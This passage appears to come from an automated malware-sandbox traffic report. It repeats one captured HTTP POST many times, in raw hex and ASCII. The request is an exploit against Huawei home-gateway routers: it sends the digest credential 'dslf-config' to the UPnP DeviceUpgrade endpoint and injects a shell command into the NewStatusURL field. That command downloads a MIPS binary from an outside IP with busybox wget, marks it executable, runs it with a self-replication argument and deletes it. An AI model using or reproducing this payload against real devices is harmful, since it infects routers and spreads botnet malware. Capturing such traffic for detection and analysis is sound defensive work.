3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 198.12.107.126 -l /tmp/bigH -r /YourName/BinName.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 38 2e 31 32 2e 31 30 37 2e 31 32 36 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 59 6f 75 72 4e 61 6d 65 2f 42 69 6e 4e 61 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 198.12.107.126 -l /tmp/bigH -r /YourName/BinName.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 38 2e 31 32 2e 31 30 37 2e 31 32 36 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 59 6f 75 72 4e 61 6d 65 2f 42 69 6e 4e 61 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 198.12.107.126 -l /tmp/bigH -r /YourName/BinName.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 38 2e 31 32 2e 31 30 37 2e 31 32 36 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 59 6f 75 72 4e 61 6d 65 2f 42 69 6e 4e 61 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 198.12.107.126 -l /tmp/bigH -r /YourName/BinName.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 38 2e 31 32 2e 31 30 37 2e 31 32 36 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 59 6f 75 72 4e 61 6d 65 2f 42 69 6e 4e 61 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 198.12.107.126 -l /tmp/bigH -r /YourName/BinName.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 38 2e 31 32 2e 31 30 37 2e 31 32 36 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 59 6f 75 72 4e 61 6d 65 2f 42 69 6e 4e 61 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 198.12.107.126 -l /tmp/bigH -r /YourName/BinName.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 38 2e 31 32 2e 31 30 37 2e 31 32 36 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 59 6f 75 72 4e 61 6d 65 2f 42 69 6e 4e 61 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 198.12.107.126 -l /tmp/bigH -r /YourName/BinName.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 38 2e 31 32 2e 31 30 37 2e 31 32 36 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 59 6f 75 72 4e 61 6d 65 2f 42 69 6e 4e 61 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 198.12.107.126 -l /tmp/bigH -r /YourName/BinName.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 38 2e 31 32 2e 31 30 37 2e 31 32 36 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 59 6f 75 72 4e 61 6d 65 2f 42 69 6e 4e 61 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 198.12.107.126 -l /tmp/bigH -r /YourName/BinName.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 38 2e 31 32 2e 31 30 37 2e 31 32 36 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 59 6f 75 72 4e 61 6d 65 2f 42 69 6e 4e 61 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade 